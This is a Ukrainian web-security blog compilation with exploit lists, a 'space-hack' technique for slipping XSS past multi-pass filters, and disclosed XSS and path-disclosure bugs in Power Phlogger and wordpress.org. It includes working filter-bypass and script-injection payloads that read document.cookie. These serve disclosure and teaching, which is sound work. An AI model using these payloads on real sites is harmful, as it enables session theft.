Websecurity - Веб безпека

В даній добірці експлоіти в веб додатках:

• Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability (деталі)
• Joomla Component com_galeria Remote SQL Injection Vulnerability (деталі)
• Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability (деталі)
• XOOPS Module classifieds (cid) Remote SQL Injection Vulnerability (деталі)
• PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability (деталі)
• PunBB <= 1.2.16 Blind Password Recovery Exploit (деталі)
• MultiCart 2.0 (productdetails.php) Remote SQL Injection Exploit (деталі)
• Woltlab Burning Board 3.0.x Remote Blind SQL Injection Exploit (деталі)
• Globsy 1.0 (file) Remote File Disclosure Vulnerability (деталі)
• Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit (деталі)

Розповім вам про обхід багатопрохідних фільтрів (multi-pass filters bypass). У випадку коли на веб сайті використовується комплексна (багатопрохідна) система фільтрації, зокрема для фільтрації XSS, можливий обхід багатопрохідних фільтрів. Подібні багатопрохідні системи фільтрації можуть використовуватися на великих порталах та соціальних мережах.

Існує одна техніка обходу багатопрохідних фільтрів, що була розроблена мною в 2007 році. Техніка обходу фільтрів з використанням пробілу. Я назвав її технікою спейс-хакінгу (space-hack technique). Про неї я писав під час Місяця багів в MySpace.

Суть техніки полягає в тому, що у випадку, коли веб сайт використовує багатопрохідний фільтр (зокрема фільтр XSS), котрий спочатку перевіряє на предмет атакуючого коду (XSS), а потім витирає пробіли, щоб привести дані до потрібного стану, то ця особливість фільтрації може бути використана. Використовуючи багатопрохідність фільтра, можна спочатку відправити дані з пробілами, щоб з ними обійти фільтр, а на наступній стадії фільтра всі пробіли будуть витерті, що зробить код знову робочим і він виконається на сторінці користувача.

Розглянемо наступні приклади.

1. Код для обходу багатопрохідних фільтрів:

<p/style="xss:e xpression(alert(document.cookie))">

На першій стадії фільтр перевіряє на наявність XSS кода: перевіряється наявність ключевих слів, в тому числі й “expression”. Враховуючи, що в даному випадку використовується “e xpression”, то ключевих слів не знаходиться і даний рядок проходить фільтр.

На другій стадії фільтр витирає пробіли: в результаті ми отримаємо код, що виконається на сторінці користувача:

<p/style="xss:expression(alert(document.cookie))">

Зазначу, що враховуючи другу стадію, я використовав “<p/style”, а не “<p style”, щоб зробити код робочим після проходження фільтрів (бо пробіли витираються на другій стадії фільтрації).

2. Код для обходу багатопрохідних фільтрів:

<img/width="100"src="http://site/image.jpg"o nLoad="alert(document.cookie)">

На першій стадії фільтр перевіряє на наявність XSS кода: враховуючи, що в даному випадку використовується “o nLoad”, то ключевих слів не знаходиться і даний рядок проходить фільтр.

На другій стадії фільтр витирає пробіли: в результаті ми отримаємо код, що виконається на сторінці користувача:

<img/width="100"src="http://site/image.jpg"onLoad="alert(document.cookie)">

Як я вже зазначав, враховуючи другу стадію, в якості роздільника між ім’ям тега та його властивістю я використав “/”, тобто використав запис “<img/width”. Для того щоб зробити код робочим після проходження фільтрів.

Як видно з наведених прикладів, використовуючи техніку спейс-хакінгу можна обходити багатопрохідні фільтри. Розробникам веб додатків варто врахувати дану техніку при розробці систем фільтрації.

Виявлені численні уразливості в браузері Opera.

Уразливі версії: Opera 9.26.

Численні ушкодження пам’яті, проблеми з введенням паролів.

• Opera: Multiple vulnerabilities (деталі)

В даній добірці уразливості в веб додатках:

• c-arbre <= Multiple Remote File Include Vulnerablitiy (деталі)
• Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit (деталі)
• File117 Remote File Inclusion (деталі)
• PHPMyBibli <= Multiple Remote File Include (деталі)
• lms 1.5.3 Remote File Inclusion (деталі)
• claroline <= Multiple Remote File Include Vulnerablitiy (деталі)
• Allfaclassfieds (level2.php dir) remote file inclusion (деталі)
• Full Path Disclosure in SendCard (деталі)
• Prototype of an PHP application ===> RFI (деталі)
• Remote file inclusion vulnerability in cPanel WebHost Manager (WHM) (деталі)

Раніше я вже писав про уразливості в Power Phlogger. Зараз повідомлю про нові уразливості в даній системі для ведення статистики відвідувань. В лютому, 16.02.2008, я виявив Cross-Site Scripting та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

XSS (Persistent):

POST запит на сторінці http://site/edUserprofile.php (можливі як GET, так і POST запити):

</textarea><script>alert(document.cookie)</script>В параметрі: N_your_url.

"><script>alert(document.cookie)</script>В параметрі: N_email.

"><script src=http://site.comВ параметрах: N_fg_c, N_bg_c (обмеження в 30 символів).

XSS:

http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це третя частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

На початку місяця, 01.05.2008, вийшов PHP 5.2.6, у якому виправлено більше 120 помилок, в тому числі уразливостей. Даний реліз направлений на покращення стабільності гілки 5.2.x.

Серед секюріті покращень та виправлень в PHP 5.2.6:

• Виправлене можливе переповнення буфера в FastCGI SAPI.
• Виправлене цілочислене переповнення в printf().
• Виправлена уразливість, що описана в CVE-2008-0599.
• Виправлений обхід safe_mode в cURL.
• Краще виправлена уразливість з неповними багатобайтними символами в escapeshellcmd().
• Обновлений PCRE до версії 7.6.

По матеріалам http://www.php.net.

06.08.2007

Вчора, 05.08.2007, я знайшов Cross-Site Scripting уразливості на wordpress.org - сайті розробників WordPress. Про що найближчим часом сповіщу адміністрацію сайта.

Дані XSS дірки я знайшов, як раз коли зайшов на сайт почитати новину про вихід нових версій WP (про що я писав перед цим).

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.05.2008

XSS:

POST запит на сторінці http://wordpress.org/report-bugs/:

"><script>alert(document.cookie)</script>В полях: Your Email, URL of Problem.

</textarea><script>alert(document.cookie)</script>В полі: Describe in detail.

Дані уразливості вже виправлені.

В даній добірці експлоіти в веб додатках:

• Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit (деталі)
• Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability (деталі)
• Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability (деталі)
• LightBlog 9.6 (username) Local File Inclusion Vulnerability (деталі)
• Thecus N5200Pro NAS Server Control Panel RFI Vulnerability (деталі)
• sCssBoard (pwnpack) Multiple Versions Remote Exploit (деталі)
• PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability (деталі)
• XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability (деталі)
• RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability (деталі)
• SimpGB v1.46.0 Remote File Include Exploit (деталі)

Нова добірка експлоітів для останніх помилок (уразливостей) в Internet Explorer. В ній представлені експлоіти для IE6 та IE7.

• Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) (деталі)
• MS Internet Explorer 6 DirectX Media DoS Exploit (деталі)
• MS Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC (деталі)

Попередня добірка eксплоітів для Internet Explorer.

В своїй статті Advanced Cross-Site-Scripting with Real-time Remote Attacker Control, Anton Rager розповідає про просунуті Cross-Site Scripting атаки. Про використання XSS уразливостей для проведення просунутих атак, що будуть у реальному часі віддалено контролюватися нападником. З метою віддаленого контролю над браузером користувача.

Про статтю Просунутий міжсайтовий скриптінг із віддаленим контролем у реальному часі (на російській мові), що зроблена на основі даної статті Антона, я писав ще в 2006 році. Подібні XSS атаки зараз стали ще більш актуальними.